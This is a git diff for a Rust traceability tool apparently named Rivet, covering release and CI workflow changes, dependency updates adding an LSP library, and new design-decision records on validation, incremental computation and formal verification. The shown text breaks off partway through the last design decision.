diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index abe892c..0f74f56 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -221,6 +221,16 @@ jobs: - name: Check supply chain run: cargo vet --locked || echo "::warning::cargo-vet found unaudited crates — run 'cargo vet' locally" + # ── Kani bounded model checking ──────────────────────────────────── + kani: + name: Kani Proofs + runs-on: ubuntu-latest + continue-on-error: true + steps: + - uses: actions/checkout@v6 + - uses: model-checking/kani-github-action@v1 + - run: cargo kani -p rivet-core + # ── MSRV check ────────────────────────────────────────────────────── msrv: name: MSRV (1.89) diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml index c4962b8..076ca33 100644 --- a/.github/workflows/release.yml +++ b/.github/workflows/release.yml @@ -1,4 +1,4 @@ -name: Release Test Evidence +name: Release on: push: @@ -12,8 +12,112 @@ env: CARGO_TERM_COLOR: always jobs: - test-evidence: - name: Build Test Evidence Bundle + # ── Cross-platform binary builds ────────────────────────────────────── + build-binaries: + name: Build ${{ matrix.target }} + runs-on: ${{ matrix.os }} + strategy: + matrix: + include: + - target: x86_64-unknown-linux-gnu + os: ubuntu-latest + archive: tar.gz + - target: aarch64-unknown-linux-gnu + os: ubuntu-latest + archive: tar.gz + cross: true + - target: x86_64-apple-darwin + os: macos-14 + archive: tar.gz + - target: aarch64-apple-darwin + os: macos-latest + archive: tar.gz + - target: x86_64-pc-windows-msvc + os: windows-latest + archive: zip + steps: + - uses: actions/checkout@v4 + + - uses: dtolnay/rust-toolchain@stable + with: + targets: ${{ matrix.target }} + + - uses: Swatinem/rust-cache@v2 + with: + key: release-${{ matrix.target }} + + - name: Install cross + if: matrix.cross + run: cargo install cross --git https://github.com/cross-rs/cross + + - name: Build (native) + if: ${{ !matrix.cross }} + run: cargo build --release 
--target ${{ matrix.target }} -p rivet-cli + + - name: Build (cross) + if: matrix.cross + run: cross build --release --target ${{ matrix.target }} -p rivet-cli + + - name: Strip binary (Unix) + if: runner.os != 'Windows' + run: strip "target/${{ matrix.target }}/release/rivet" 2>/dev/null || true + + - name: Package (tar.gz) + if: matrix.archive == 'tar.gz' + env: + TARGET: ${{ matrix.target }} + run: | + VERSION="${GITHUB_REF#refs/tags/}" + ARCHIVE="rivet-${VERSION}-${TARGET}.tar.gz" + mkdir -p staging + cp "target/${TARGET}/release/rivet" staging/ + tar -czf "$ARCHIVE" -C staging . + echo "ARCHIVE=$ARCHIVE" >> "$GITHUB_ENV" + + - name: Package (zip) + if: matrix.archive == 'zip' + shell: bash + env: + TARGET: ${{ matrix.target }} + run: | + VERSION="${GITHUB_REF#refs/tags/}" + ARCHIVE="rivet-${VERSION}-${TARGET}.zip" + mkdir -p staging + cp "target/${TARGET}/release/rivet.exe" staging/ + cd staging && 7z a "../$ARCHIVE" . && cd .. + echo "ARCHIVE=$ARCHIVE" >> "$GITHUB_ENV" + + - uses: actions/upload-artifact@v4 + with: + name: binary-${{ matrix.target }} + path: ${{ env.ARCHIVE }} + + # ── Compliance report (HTML export) ─────────────────────────────────── + build-compliance: + name: Build compliance report + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - uses: dtolnay/rust-toolchain@stable + - uses: Swatinem/rust-cache@v2 + + - name: Generate compliance report + run: | + VERSION="${GITHUB_REF#refs/tags/}" + mkdir -p compliance-report + cargo run --release -- validate > compliance-report/validation.txt 2>&1 || true + cargo run --release -- stats > compliance-report/stats.txt 2>&1 + cargo run --release -- export --format html --output compliance-report/artifacts.html 2>&1 || true + tar czf "rivet-${VERSION}-compliance.tar.gz" compliance-report/ + + - uses: actions/upload-artifact@v4 + with: + name: compliance-report + path: rivet-*-compliance.tar.gz + + # ── Test evidence bundle ────────────────────────────────────────────── + 
build-test-evidence: + name: Build test evidence runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 @@ -21,37 +125,39 @@ jobs: - uses: dtolnay/rust-toolchain@nightly with: components: llvm-tools-preview + targets: wasm32-wasip2 - uses: Swatinem/rust-cache@v2 - # Install tools: cargo-nextest for JUnit XML, cargo-llvm-cov for coverage - - name: Install cargo-nextest and cargo-llvm-cov + - name: Install tools uses: taiki-e/install-action@v2 with: tool: cargo-nextest,cargo-llvm-cov - # ── 1. Test suite with JUnit XML output ───────────────────────────── - - name: Run tests with JUnit XML output + - name: Build spar WASM assets + run: | + git clone --depth 1 https://github.com/pulseengine/spar.git ../spar + npm install -g @bytecodealliance/jco + ./scripts/build-wasm.sh ../spar + + - name: Run tests with JUnit XML run: | mkdir -p test-evidence/test-results cargo nextest run --all --profile ci cp target/nextest/ci/junit.xml test-evidence/test-results/junit.xml - # ── 2. Code coverage (LCOV) ──────────────────────────────────────── - - name: Generate code coverage (LCOV) + - name: Generate coverage run: | mkdir -p test-evidence/coverage cargo llvm-cov --all-features --workspace --lcov --output-path test-evidence/coverage/lcov.info - cargo llvm-cov report --all-features --workspace > test-evidence/coverage/summary.txt + cargo llvm-cov report --workspace > test-evidence/coverage/summary.txt - # ── 3. Benchmarks (criterion HTML reports) ───────────────────────── - - name: Run criterion benchmarks + - name: Run benchmarks run: | cargo bench --bench core_benchmarks -- --output-format=criterion mkdir -p test-evidence/benchmarks cp -r target/criterion/* test-evidence/benchmarks/ 2>/dev/null || true - # ── 4. Rivet validate ────────────────────────────────────────────── - name: Run rivet validate run: | mkdir -p test-evidence/validation @@ -59,45 +165,61 @@ jobs: cargo run --release -- validate > test-evidence/validation/validate-output.txt 2>&1 rc=$? 
set -e - echo "" >> test-evidence/validation/validate-output.txt echo "exit_code=${rc}" >> test-evidence/validation/validate-output.txt - # ── 5. Metadata ──────────────────────────────────────────────────── - - name: Generate metadata.json + - name: Generate metadata run: | TAG="${GITHUB_REF#refs/tags/}" - RUST_VERSION="$(rustc --version)" - OS_INFO="$(uname -srm)" - TIMESTAMP="$(date -u +%Y-%m-%dT%H:%M:%SZ)" - jq -n \ --arg tag "${TAG}" \ --arg commit "${GITHUB_SHA}" \ - --arg timestamp "${TIMESTAMP}" \ - --arg rust_version "${RUST_VERSION}" \ - --arg os "${OS_INFO}" \ + --arg timestamp "$(date -u +%Y-%m-%dT%H:%M:%SZ)" \ + --arg rust_version "$(rustc --version)" \ + --arg os "$(uname -srm)" \ '{tag: $tag, commit: $commit, timestamp: $timestamp, rust_version: $rust_version, os: $os}' \ > test-evidence/metadata.json - # ── 6. Package everything ────────────────────────────────────────── - - name: Package test evidence tarball - id: package + - name: Package run: | - TAG="${GITHUB_REF#refs/tags/}" - ARCHIVE="test-evidence-${TAG}.tar.gz" - tar czf "${ARCHIVE}" test-evidence/ - echo "archive=${ARCHIVE}" >> "$GITHUB_OUTPUT" - echo "tag=${TAG}" >> "$GITHUB_OUTPUT" + VERSION="${GITHUB_REF#refs/tags/}" + tar czf "rivet-${VERSION}-test-evidence.tar.gz" test-evidence/ - # ── 7. 
Create GitHub Release with asset ──────────────────────────── - - name: Create GitHub Release + - uses: actions/upload-artifact@v4 + with: + name: test-evidence + path: rivet-*-test-evidence.tar.gz + + # ── Create GitHub Release ───────────────────────────────────────────── + create-release: + name: Create GitHub Release + needs: [build-binaries, build-compliance, build-test-evidence] + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + + - name: Download all artifacts + uses: actions/download-artifact@v4 + with: + path: artifacts + + - name: Collect assets + run: | + mkdir -p release + find artifacts -type f \( -name "*.tar.gz" -o -name "*.zip" \) -exec mv {} release/ \; + ls -la release/ + + - name: Generate checksums + run: | + cd release + sha256sum * > SHA256SUMS.txt + cat SHA256SUMS.txt + + - name: Create Release env: GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} run: | - TAG="${{ steps.package.outputs.tag }}" - ARCHIVE="${{ steps.package.outputs.archive }}" - - gh release create "${TAG}" \ - --title "Release ${TAG}" \ + VERSION="${GITHUB_REF#refs/tags/}" + gh release create "$VERSION" \ + --title "Rivet $VERSION" \ --generate-notes \ - "${ARCHIVE}#Test Evidence (tar.gz)" + release/* diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml index ed4c798..6493be4 100644 --- a/.pre-commit-config.yaml +++ b/.pre-commit-config.yaml @@ -39,7 +39,7 @@ repos: # ── Linting ──────────────────────────────────────────────────── - id: cargo-clippy name: cargo clippy -D warnings - entry: cargo clippy --all-targets -- -D warnings + entry: cargo +stable clippy --all-targets -- -D warnings language: system types: [rust] pass_filenames: false @@ -64,7 +64,7 @@ repos: # ── Dogfood validation ───────────────────────────────────── - id: rivet-validate name: rivet validate (dogfood) - entry: rivet validate --strict + entry: cargo run --release -p rivet-cli -- validate language: system pass_filenames: false files: 
'(artifacts/.*\.yaml|schemas/.*\.yaml|safety/.*\.yaml|rivet\.yaml)$' diff --git a/Cargo.lock b/Cargo.lock index dcff37c..bbbbcd0 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -136,6 +136,17 @@ version = "1.1.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "1505bd5d3d116872e7271a6d4e16d81d0c8570876c8de68093a09ac269d8aac0" +[[package]] +name = "auto_impl" +version = "1.3.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ffdcb70bdbc4d478427380519163274ac86e52916e10f0a8889adf0f96d3fee7" +dependencies = [ + "proc-macro2", + "quote", + "syn", +] + [[package]] name = "autocfg" version = "1.5.0" @@ -169,7 +180,7 @@ dependencies = [ "serde_urlencoded", "sync_wrapper", "tokio", - "tower", + "tower 0.5.3", "tower-layer", "tower-service", "tracing", @@ -215,6 +226,12 @@ version = "0.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "5e764a1d40d510daf35e07be9eb06e75770908c27d411ee6c92109c9840eaaf7" +[[package]] +name = "bitflags" +version = "1.3.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "bef38d45163c2f1dde094a7dfd33ccf595c92905c8f8f4fdc18d06fb1037718a" + [[package]] name = "bitflags" version = "2.11.0" @@ -745,6 +762,19 @@ dependencies = [ "typenum", ] +[[package]] +name = "dashmap" +version = "5.5.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "978747c1d849a7d2ee5e8adc0159961c48fb7e5db2f06af6723b80123bb53856" +dependencies = [ + "cfg-if", + "hashbrown 0.14.5", + "lock_api", + "once_cell", + "parking_lot_core", +] + [[package]] name = "deadpool" version = "0.12.3" @@ -884,7 +914,7 @@ dependencies = [ name = "etch" version = "0.1.0" dependencies = [ - "petgraph", + "petgraph 0.7.1", ] [[package]] @@ -916,6 +946,12 @@ version = "0.4.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "0ce7134b9999ecaf8bcd65542e436736ef32ddca1b3e06094cb6ec5755203b80" +[[package]] +name = "fixedbitset" 
+version = "0.5.7" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1d674e81391d1e1ab681a28d99df07927c6d4aa5b027d7da16ba32d1d21ecd99" + [[package]] name = "fnv" version = "1.0.7" @@ -1057,7 +1093,7 @@ version = "0.8.1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "25234f20a3ec0a962a61770cfe39ecf03cb529a6e474ad8cff025ed497eda557" dependencies = [ - "bitflags", + "bitflags 2.11.0", "debugid", "rustc-hash 2.1.1", "serde", @@ -1720,6 +1756,19 @@ version = "0.4.29" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "5e5032e24019045c762d3c0f28f5b6b8bbf38563a65908389bf7978758920897" +[[package]] +name = "lsp-types" +version = "0.94.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c66bfd44a06ae10647fe3f8214762e9369fd4248df1350924b4ef9e770a85ea1" +dependencies = [ + "bitflags 1.3.2", + "serde", + "serde_json", + "serde_repr", + "url", +] + [[package]] name = "mach2" version = "0.4.3" @@ -1864,7 +1913,7 @@ version = "0.10.75" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "08838db121398ad17ab8531ce9de97b244589089e290a384c900cb9ff7434328" dependencies = [ - "bitflags", + "bitflags 2.11.0", "cfg-if", "foreign-types", "libc", @@ -1937,10 +1986,40 @@ version = "0.6.5" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "b4c5cc86750666a3ed20bdaf5ca2a0344f9c67674cae0515bec2da16fbaa47db" dependencies = [ - "fixedbitset", + "fixedbitset 0.4.2", "indexmap", ] +[[package]] +name = "petgraph" +version = "0.7.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3672b37090dbd86368a4145bc067582552b29c27377cad4e0a306c97f9bd7772" +dependencies = [ + "fixedbitset 0.5.7", + "indexmap", +] + +[[package]] +name = "pin-project" +version = "1.1.11" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f1749c7ed4bcaf4c3d0a3efc28538844fb29bcdd7d2b67b2be7e20ba861ff517" 
+dependencies = [ + "pin-project-internal", +] + +[[package]] +name = "pin-project-internal" +version = "1.1.11" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d9b20ed30f105399776b9c883e68e536ef602a16ae6f596d2c473591d6ad64c6" +dependencies = [ + "proc-macro2", + "quote", + "syn", +] + [[package]] name = "pin-project-lite" version = "0.2.17" @@ -2059,7 +2138,7 @@ checksum = "37566cb3fdacef14c0737f9546df7cfeadbfbc9fef10991038bf5015d0c80532" dependencies = [ "bit-set", "bit-vec", - "bitflags", + "bitflags 2.11.0", "num-traits", "rand 0.9.2", "rand_chacha 0.9.0", @@ -2233,7 +2312,7 @@ version = "0.5.18" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "ed2bf2547551a7053d6fdfafda3f938979645c44812fbfcda098faae3f1a362d" dependencies = [ - "bitflags", + "bitflags 2.11.0", ] [[package]] @@ -2321,7 +2400,7 @@ dependencies = [ "sync_wrapper", "tokio", "tokio-native-tls", - "tower", + "tower 0.5.3", "tower-http", "tower-service", "url", @@ -2354,7 +2433,7 @@ dependencies = [ "env_logger", "etch", "log", - "petgraph", + "petgraph 0.7.1", "rivet-core", "serde", "serde_json", @@ -2362,6 +2441,7 @@ dependencies = [ "tempfile", "tokio", "tower-http", + "tower-lsp", "urlencoding", ] @@ -2372,7 +2452,7 @@ dependencies = [ "anyhow", "criterion", "log", - "petgraph", + "petgraph 0.7.1", "proptest", "quick-xml", "reqwest", @@ -2427,7 +2507,7 @@ version = "0.38.44" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "fdb5bc1ae2baa591800df16c9ca78619bf65c0488b41b96ccec5d11220d8c154" dependencies = [ - "bitflags", + "bitflags 2.11.0", "errno", "libc", "linux-raw-sys 0.4.15", @@ -2440,7 +2520,7 @@ version = "1.1.4" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "b6fe4565b9518b83ef4f91bb47ce29620ca828bd32cb7e408f0062e9930ba190" dependencies = [ - "bitflags", + "bitflags 2.11.0", "errno", "libc", "linux-raw-sys 0.12.1", @@ -2602,7 +2682,7 @@ version = "3.7.0" source = 
"registry+https://github.com/rust-lang/crates.io-index" checksum = "b7f4bc775c73d9a02cde8bf7b2ec4c9d12743edf609006c7facc23998404cd1d" dependencies = [ - "bitflags", + "bitflags 2.11.0", "core-foundation 0.10.1", "core-foundation-sys", "libc", @@ -2683,6 +2763,17 @@ dependencies = [ "serde_core", ] +[[package]] +name = "serde_repr" +version = "0.1.20" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "175ee3e80ae9982737ca543e96133087cbd9a485eecc3bc4de9c1a37b47ea59c" +dependencies = [ + "proc-macro2", + "quote", + "syn", +] + [[package]] name = "serde_spanned" version = "1.0.4" @@ -2946,7 +3037,7 @@ version = "0.7.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "a13f3d0daba03132c0aa9767f98351b3488edc2c100cda2d2ec2b04f3d8d3c8b" dependencies = [ - "bitflags", + "bitflags 2.11.0", "core-foundation 0.9.4", "system-configuration-sys", ] @@ -2967,7 +3058,7 @@ version = "0.27.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "cc4592f674ce18521c2a81483873a49596655b179f71c5e05d10c1fe66c78745" dependencies = [ - "bitflags", + "bitflags 2.11.0", "cap-fs-ext", "cap-std", "fd-lock", @@ -3177,6 +3268,20 @@ version = "1.0.6+spec-1.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "ab16f14aed21ee8bfd8ec22513f7287cd4a91aa92e44edfe2c17ddd004e92607" +[[package]] +name = "tower" +version = "0.4.13" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b8fa9be0de6cf49e536ce1851f987bd21a43b771b09473c3549a6c853db37c1c" +dependencies = [ + "futures-core", + "futures-util", + "pin-project", + "pin-project-lite", + "tower-layer", + "tower-service", +] + [[package]] name = "tower" version = "0.5.3" @@ -3199,7 +3304,7 @@ version = "0.6.8" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "d4e6559d53cc268e5031cd8429d05415bc4cb4aefc4aa5d6cc35fbf5b924a1f8" dependencies = [ - "bitflags", + "bitflags 2.11.0", "bytes", 
"futures-core", "futures-util", @@ -3215,7 +3320,7 @@ dependencies = [ "pin-project-lite", "tokio", "tokio-util", - "tower", + "tower 0.5.3", "tower-layer", "tower-service", "tracing", @@ -3227,6 +3332,40 @@ version = "0.3.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "121c2a6cda46980bb0fcd1647ffaf6cd3fc79a013de288782836f6df9c48780e" +[[package]] +name = "tower-lsp" +version = "0.20.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d4ba052b54a6627628d9b3c34c176e7eda8359b7da9acd497b9f20998d118508" +dependencies = [ + "async-trait", + "auto_impl", + "bytes", + "dashmap", + "futures", + "httparse", + "lsp-types", + "memchr", + "serde", + "serde_json", + "tokio", + "tokio-util", + "tower 0.4.13", + "tower-lsp-macros", + "tracing", +] + +[[package]] +name = "tower-lsp-macros" +version = "0.9.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "84fd902d4e0b9a4b27f2f440108dc034e1758628a9b702f8ec61ad66355422fa" +dependencies = [ + "proc-macro2", + "quote", + "syn", +] + [[package]] name = "tower-service" version = "0.3.3" @@ -3329,6 +3468,7 @@ dependencies = [ "idna", "percent-encoding", "serde", + "serde_derive", ] [[package]] @@ -3493,7 +3633,7 @@ dependencies = [ "im-rc", "indexmap", "log", - "petgraph", + "petgraph 0.6.5", "serde", "serde_derive", "serde_yaml", @@ -3541,7 +3681,7 @@ version = "0.244.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "47b807c72e1bac69382b3a6fb3dbe8ea4c0ed87ff5629b8685ae6b9a611028fe" dependencies = [ - "bitflags", + "bitflags 2.11.0", "hashbrown 0.15.5", "indexmap", "semver", @@ -3554,7 +3694,7 @@ version = "0.245.1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "4f08c9adee0428b7bddf3890fc27e015ac4b761cc608c822667102b8bfd6995e" dependencies = [ - "bitflags", + "bitflags 2.11.0", "indexmap", "semver", ] @@ -3578,7 +3718,7 @@ checksum = 
"39bef52be4fb4c5b47d36f847172e896bc94b35c9c6a6f07117686bd16ed89a7" dependencies = [ "addr2line", "async-trait", - "bitflags", + "bitflags 2.11.0", "bumpalo", "cc", "cfg-if", @@ -3817,7 +3957,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "102d0d70dbfede00e4cc9c24e86df6d32c03bf6f5ad06b5d6c76b0a4a5004c4a" dependencies = [ "anyhow", - "bitflags", + "bitflags 2.11.0", "heck", "indexmap", "wit-parser", @@ -3830,7 +3970,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "ea938f6f4f11e5ffe6d8b6f34c9a994821db9511c3e9c98e535896f27d06bb92" dependencies = [ "async-trait", - "bitflags", + "bitflags 2.11.0", "bytes", "cap-fs-ext", "cap-net-ext", @@ -3913,7 +4053,7 @@ version = "42.0.1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "2dca2bf96d20f0c70e6741cc6c8c1a9ee4c3c0310c7ad1971242628c083cc9a5" dependencies = [ - "bitflags", + "bitflags 2.11.0", "thiserror 2.0.18", "tracing", "wasmtime", @@ -4170,7 +4310,7 @@ version = "0.36.4" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "3f3fd376f71958b862e7afb20cfe5a22830e1963462f3a17f49d82a6c1d1f42d" dependencies = [ - "bitflags", + "bitflags 2.11.0", "windows-sys 0.59.0", ] @@ -4255,7 +4395,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "9d66ea20e9553b30172b5e831994e35fbde2d165325bec84fc43dbf6f4eb9cb2" dependencies = [ "anyhow", - "bitflags", + "bitflags 2.11.0", "indexmap", "log", "serde", diff --git a/Cargo.toml b/Cargo.toml index e35b7ea..96fd96c 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -13,6 +13,9 @@ edition = "2024" license = "Apache-2.0" rust-version = "1.89" +[workspace.lints.rust] +unexpected_cfgs = { level = "warn", check-cfg = ['cfg(kani)'] } + [workspace.dependencies] # Serialization serde = { version = "1", features = ["derive"] } @@ -27,12 +30,15 @@ thiserror = "2" clap = { version = "4", features = ["derive"] } # Graph -petgraph = "0.6" +petgraph = "0.7" # Logging 
log = "0.4" env_logger = "0.11" +# LSP +tower-lsp = "0.20" + # HTTP / serve axum = "0.8" reqwest = { version = "0.12", features = ["json"] } diff --git a/artifacts/decisions.yaml b/artifacts/decisions.yaml index bb68cb4..1ae4609 100644 --- a/artifacts/decisions.yaml +++ b/artifacts/decisions.yaml @@ -366,3 +366,308 @@ artifacts: rationale: > Scales naturally. Avoids redundant declarations. Similar to cargo/npm dependency resolution. + + - id: DD-018 + type: design-decision + title: Schema-embedded conditional rules over external rule engine + status: draft + description: > + Conditional validation rules are expressed directly in schema YAML + using a when/then syntax, rather than using an external rule engine + (OPA, Drools) or embedding Lua/WASM scripting. + tags: [validation, schema] + links: + - type: satisfies + target: REQ-023 + fields: + rationale: > + YAML-native rules keep the single-source-of-truth principle — the + schema file fully describes what is valid. An external rule engine + adds a deployment dependency and splits validation logic across + two systems. Eclipse SCORE's metamodel.yaml approach validates this + direction — their community prefers declarative YAML over code. + alternatives: > + OPA/Rego policies or embedded Lua scripting for validation rules. + Rejected because they add runtime dependencies and split validation + logic away from the schema that defines the types. + + - id: DD-019 + type: design-decision + title: Content hashing with graph traversal for impact analysis + status: draft + description: > + Change impact is computed by content-hashing each artifact (title + + description + fields + links), diffing hashes against a baseline, + and walking the petgraph link graph from changed nodes to find + transitively affected artifacts. No separate change-tracking database. 
+ tags: [traceability, baseline] + links: + - type: satisfies + target: REQ-024 + fields: + rationale: > + Combines two existing capabilities (rivet diff + petgraph reachability) + rather than adding infrastructure. Content hashing is deterministic + and git-friendly. Eclipse SCORE is waiting on sphinx-needs upstream + to implement hash-based versioned links — Rivet can implement this + natively since artifacts are plain data structures. + alternatives: > + Git-diff-based detection (parse YAML file diffs). Rejected because + YAML formatting changes produce false positives and it cannot detect + semantic changes (e.g., reordered fields that are logically identical). + + - id: DD-020 + type: design-decision + title: Configurable type mapping for needs.json import + status: draft + description: > + The needs-json adapter uses a user-defined type-mapping table in + rivet.yaml to convert sphinx-needs type names to rivet schema types, + rather than hard-coding a fixed mapping or auto-generating types. + tags: [interchange, adapter] + links: + - type: satisfies + target: REQ-025 + fields: + rationale: > + Every sphinx-needs project defines its own custom types (SCORE has + 50+). A fixed mapping would only work for one project. User-defined + mapping lets teams control how their specific types map to rivet + schemas. The same approach works for ID format transformation + (underscores to dashes, prefix stripping). + alternatives: > + Auto-generate rivet schema types from needs.json structure. + Rejected because it would create throwaway types that don't + align with any standard schema (aspice, stpa, cybersecurity). + + - id: DD-021 + type: design-decision + title: Ephemeral test nodes via source scanning over materialized YAML + status: draft + description: > + Test-to-requirement links are extracted from source code markers and + test results at analysis time, injected as ephemeral nodes into the + link graph — the same pattern used for commit traceability (DD-012). 
+ No test artifact YAML files are generated. + tags: [testing, traceability] + links: + - type: satisfies + target: REQ-026 + fields: + rationale: > + Test code is the source of truth for what tests exist and what they + verify. Materializing test YAML creates a redundant store that drifts + from the actual test suite. The ephemeral injection pattern is already + proven for commit nodes (DD-012) and avoids the maintenance burden + Eclipse SCORE faces with their manual test specification YAML. + alternatives: > + Generate test artifact YAML via a rivet sync-tests command. + Rejected because it creates thousands of files that must be + re-synced whenever tests change, duplicating DD-012's lesson. + + - id: DD-022 + type: design-decision + title: Build-system providers over rivet-specific externals config + status: draft + description: > + Cross-repo dependencies are discovered via pluggable build-system + providers (Bazel, Nix, custom JSON) rather than a rivet-specific + externals block. Each provider reads the build system's native + manifest to extract repo URLs, pinned revisions, and workspace + paths. Manual overrides are still supported for artifact-path + hints and repos not in the build graph. + tags: [cross-repo, bazel, nix] + links: + - type: satisfies + target: REQ-027 + - type: satisfies + target: REQ-020 + fields: + rationale: > + The build system is the source of truth for what depends on what + at which version. A parallel rivet-specific config drifts and + adds maintenance burden. Bazel MODULE.bazel, Nix flake.lock, + and SCORE's known_good.json all contain exactly the information + rivet needs. Reading them directly means zero-config cross-repo + validation for projects already using these build systems. + Source code linking across repos also requires knowing workspace + paths, which the build system already resolves. + alternatives: > + Rivet-only externals config with manual repo/ref declarations. 
+ Kept as fallback for projects without Bazel or Nix, but not + the primary path for build-system-managed projects. + + - id: DD-023 + type: design-decision + title: rowan CST over serde deserialization for build-system parsers + status: draft + description: > + Build-system manifest parsers (MODULE.bazel Starlark subset) use + rowan for lossless concrete syntax trees rather than serde-based + deserialization or regex extraction. Hand-written lexer + recursive + descent parser, same architecture as spar-syntax. + tags: [parsing, rowan, architecture] + links: + - type: satisfies + target: REQ-028 + - type: satisfies + target: REQ-027 + fields: + rationale: > + rowan provides lossless CST with byte-exact spans for diagnostics, + error recovery for partial parses, and a proven architecture already + used in spar and rust-analyzer. Regex fails silently on malformed + input. serde requires well-formed input and loses positional info. + The MODULE.bazel Starlark subset is small (~30 syntax kinds) so + the parser is compact. The same rowan infrastructure will later + support schema and artifact file parsing for full LSP integration. + alternatives: > + Facebook starlark-rust crate (full interpreter, ~50k lines, + massive overkill). tree-sitter-starlark (adds C dependency, + grammar may not be maintained). Both rejected in favor of the + lightweight hand-written approach proven in spar. + + - id: DD-024 + type: design-decision + title: salsa incremental computation for the validation pipeline + status: draft + description: > + The validation pipeline is restructured as salsa tracked queries: + parse → store → link_graph → conditional_rules → validate. salsa's + dependency tracking enables incremental revalidation, free change + impact analysis, and LSP-ready architecture. Phased adoption alongside + existing serde_yaml pipeline. 
+ tags: [validation, salsa, architecture] + links: + - type: satisfies + target: REQ-029 + - type: satisfies + target: REQ-023 + - type: satisfies + target: REQ-024 + fields: + rationale: > + salsa provides automatic fine-grained dependency tracking between + computations. When one artifact changes, only affected validation + rules re-evaluate. This makes conditional rules (REQ-023) efficient + at scale and change impact analysis (REQ-024) free — impacted + artifacts are exactly the invalidated salsa queries. The same + database serves as an LSP backend for IDE integration. spar already + uses salsa 0.26 successfully for AADL incremental analysis. + alternatives: > + Manual invalidation tracking with dirty flags. Rejected because + it reimplements what salsa does correctly and is error-prone for + transitive dependencies. The phased approach keeps the existing + pipeline working during migration. + + - id: DD-028 + type: design-decision + title: Append-to-file mutation with schema pre-validation + status: draft + description: > + CLI mutation commands (add, modify, remove, link, unlink) load the + full schema and artifact store, validate the mutation against both, + then append to or modify the target YAML file. The mutation is + rejected with a diagnostic if it would violate any schema rule. + For STPA artifacts, the STPA-specific adapter handles the different + YAML structure (losses, hazards, ucas, etc.) transparently. + tags: [cli, mutation, architecture] + links: + - type: satisfies + target: REQ-031 + fields: + rationale: > + Schema pre-validation at write time catches errors immediately + rather than at the next validate run. This makes the CLI the + authoritative mutation interface — safer than hand-editing YAML + or delegating to AI agents that may produce structurally valid + but semantically wrong artifacts. Appending preserves existing + file structure and comments. + alternatives: > + Full file rewrite via serde roundtrip. 
Rejected because serde + does not preserve comments, key ordering, or blank lines in + YAML. A rowan-based YAML CST editor could preserve formatting + but is a larger investment (future work for the salsa migration). + + - id: DD-025 + type: design-decision + title: Kani bounded model checking for panic freedom + status: draft + description: > + Core algorithms (link graph construction, schema merge, artifact + ref parsing, cycle detection, cardinality validation) are verified + panic-free via Kani proof harnesses. Kani exhaustively checks all + inputs within configurable bounds using CBMC. + tags: [formal-verification, kani] + links: + - type: satisfies + target: REQ-030 + fields: + rationale: > + Kani is the lowest-effort highest-value formal verification tool + for Rust. Proof harnesses are ~10-30 lines each, similar to + proptest but exhaustive rather than random. Kani is already used + by AWS for safety-critical Rust (s2n-tls, Firecracker). It + complements existing proptest (random sampling) and Miri (UB + detection) with bounded exhaustive checking. + alternatives: > + Relying solely on proptest + fuzzing. Rejected because random + testing cannot prove absence of panics — only Kani's exhaustive + bounded checking can. Both are kept: proptest for quick CI, + Kani for proof. + + - id: DD-026 + type: design-decision + title: Verus inline proofs for validation soundness and completeness + status: draft + description: > + The validation engine's core functions are annotated with Verus + requires/ensures contracts proving soundness (PASS implies all + rules satisfied) and completeness (rule violation implies diagnostic + emitted). Verus uses SMT solving for automated proof discharge. + tags: [formal-verification, verus] + links: + - type: satisfies + target: REQ-030 + fields: + rationale: > + Verus is Rust-native — proofs are inline annotations, not a + separate language. It understands Rust ownership and lifetimes + natively. 
